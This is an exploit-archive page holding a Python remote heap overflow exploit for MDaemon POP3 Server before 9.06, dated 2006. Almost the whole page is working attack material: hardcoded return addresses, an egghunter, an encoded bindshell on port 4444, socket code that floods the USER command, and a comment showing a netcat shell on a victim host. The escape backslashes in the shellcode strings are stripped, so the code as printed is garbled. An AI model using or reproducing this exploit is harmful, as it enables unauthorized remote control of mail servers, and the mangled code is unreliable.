MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit
# Published : 2006-08-26
# Author : muts
# Previous Title : Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit
# Next Title : WFTPD 3.23 (SIZE) Remote Buffer Overflow Exploit
#!/usr/bin/python
import sys
import struct
import socket
from time import sleep
########################################################################################
# MDaemon Pre Authentication (USER) Heap Overflow 
# Code based on Leon Juranic's exploit
# Coded by muts - mati@see-security.com
# http://www.hackingdefined.com
# http://www.remote-exploit.org
# Tested on:
# 	Mdaemon 9.0.5
# 	Mdaemon 7.2.3
# 	Mdaemon 7.2.2
# 	Mdaemon 7.2.1
# 	Mdaemon 7.2.0
#		Possibly Others
#		PLEASE CONTINUE READING !
# Huge greets to xbxice and talz for leading me away from the darkness
########################################################################################
# Mdaemon is wierd. It seems like their developers decided to annoy everyone
# by making their software do unexpected things.
# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter
# shellcode - which then scans the memory, and executes a bindshell on port 4444.
# 
# On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214,
# for which I unfortunately had no explenation. 
# I later found out that these machines were fully patched ...
# After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to 
# todays' version, I noticed that the SetunhandledExceptionFilter function had changed, 
# and looks suspiciously similar to XP SP2... 
# Note that my unpatched win2k was last patched 2-3 weeks ago, 
# so I suspect this change is recent.
# The end of easy UnhandledExceptionFilter exploitation on Win2k ?
#
# So, this is a partially working exploit, on unpatched win2k boxes....
# Kiddies, treat this exploit as DOS :)
#
# I got 3 types of results with this code:
#
# 1. Shell :)	
# 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there.
# 3. Plain ugly crash - oh well.
#
# At minimum, I'de check the UnhandledExceptionFilter address before running the exploit.
######################################################################################## 
# 
# C:Documents and Settingsmuts>nc -v 192.168.220.128 4444
# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
# 
# C:MDaemonAPP>
########################################################################################

host="192.168.220.128"

ret = struct.pack("<L",0x7c2f62b6)	# 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches
ueh = struct.pack("<L",0x7C54144C)	# SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches
tap = struct.pack("<L",0xeb169090)  	# Short Jump over some garbage

# skape's egghunter shellcode 

egghunter  ="xebx21x59xb8x74x30x30x77x51x6axffx33xdbx64x89x23"
egghunter +="x6ax02x59x8bxfbxf3xafx75x07xffxe7x66x81xcbxffx0f"
egghunter +="x43xebxedxe8xdaxffxffxffx6ax0cx59x8bx04x0cxb1xb8"
egghunter +="x83x04x08x06x58x83xc4x10x50x33xc0xc3"

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum

shellcode  ="x90x90x74x30x30x77x74x30x30x77" # t00wt00w (!)
shellcode +="xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
shellcode +="x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
shellcode +="x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
shellcode +="x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
shellcode +="x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"
shellcode +="x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx38"
shellcode +="x4ex46x46x52x46x42x4bx48x45x34x4ex53x4bx48x4ex57"
shellcode +="x45x50x4ax47x41x50x4fx4ex4bx58x4fx54x4ax41x4bx48"
shellcode +="x4fx45x42x52x41x30x4bx4ex49x34x4bx58x46x33x4bx48"
shellcode +="x41x30x50x4ex41x43x42x4cx49x39x4ex4ax46x38x42x4c"
shellcode +="x46x57x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
shellcode +="x46x4fx4bx53x46x45x46x32x4ax52x45x37x45x4ex4bx38"
shellcode +="x4fx35x46x52x41x30x4bx4ex48x36x4bx58x4ex30x4bx54"
shellcode +="x4bx58x4fx45x4ex31x41x50x4bx4ex43x50x4ex42x4bx38"
shellcode +="x49x58x4ex46x46x52x4ex31x41x46x43x4cx41x53x4bx4d"
shellcode +="x46x56x4bx58x43x44x42x33x4bx48x42x54x4ex30x4bx38"
shellcode +="x42x57x4ex51x4dx4ax4bx58x42x54x4ax50x50x45x4ax46"
shellcode +="x50x48x50x34x50x30x4ex4ex42x35x4fx4fx48x4dx48x56"
shellcode +="x43x35x48x46x4ax56x43x43x44x43x4ax36x47x47x43x57"
shellcode +="x44x33x4fx45x46x45x4fx4fx42x4dx4ax46x4bx4cx4dx4e"
shellcode +="x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx55x49x38x45x4e"
shellcode +="x48x36x41x58x4dx4ex4ax30x44x30x45x55x4cx36x44x50"
shellcode +="x4fx4fx42x4dx4ax46x49x4dx49x30x45x4fx4dx4ax47x55"
shellcode +="x4fx4fx48x4dx43x45x43x55x43x45x43x35x43x55x43x34"
shellcode +="x43x45x43x44x43x45x4fx4fx42x4dx48x36x4ax56x41x51"
shellcode +="x4ex35x48x46x43x35x49x38x41x4ex45x39x4ax46x46x4a"
shellcode +="x4cx51x42x37x47x4cx47x35x4fx4fx48x4dx4cx36x42x51"
shellcode +="x41x35x45x55x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x42"
shellcode +="x49x4ex47x35x4fx4fx48x4dx43x35x45x55x4fx4fx42x4d"
shellcode +="x4ax46x45x4ex49x44x48x48x49x34x47x55x4fx4fx48x4d"
shellcode +="x42x35x46x35x46x35x45x45x4fx4fx42x4dx43x49x4ax56"
shellcode +="x47x4ex49x57x48x4cx49x47x47x55x4fx4fx48x4dx45x45"
shellcode +="x4fx4fx42x4dx48x56x4cx56x46x56x48x56x4ax46x43x46"
shellcode +="x4dx46x49x38x45x4ex4cx46x42x55x49x55x49x32x4ex4c"
shellcode +="x49x38x47x4ex4cx36x46x34x49x58x44x4ex41x33x42x4c"
shellcode +="x43x4fx4cx4ax50x4fx44x34x4dx52x50x4fx44x34x4ex42"
shellcode +="x43x59x4dx58x4cx57x4ax53x4bx4ax4bx4ax4bx4ax4ax56"
shellcode +="x44x37x50x4fx43x4bx48x51x4fx4fx45x47x46x44x4fx4f"
shellcode +="x48x4dx4bx35x47x45x44x55x41x55x41x55x41x55x4cx56"
shellcode +="x41x50x41x45x41x35x45x45x41x55x4fx4fx42x4dx4ax56"
shellcode +="x4dx4ax49x4dx45x50x50x4cx43x45x4fx4fx48x4dx4cx46"
shellcode +="x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx58x47x55x4ex4f"
shellcode +="x43x38x46x4cx46x36x4fx4fx48x4dx44x35x4fx4fx42x4d"
shellcode +="x4ax46x42x4fx4cx48x46x50x4fx35x43x55x4fx4fx48x4d"
shellcode +="x4fx4fx42x4dx5a"

buffer ="AAA"+tap+"BBBB"+ret+ueh+"x90"*90 +egghunter+"C"*346

for x in range(5):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host,110))
	data=s.recv(1024)
	print data
	s.send('USER '+'@A' * 1600 + 'x90'*5945 + shellcode +'D'*3711 + 'rn') 
	s.send('QUITrn')
	s.close()
	sleep(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + 'rn')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + 'rn')
s.close()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + 'rn')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + 'rn')
s.close()
sleep(1)

# www.Syue.com [2006-08-26]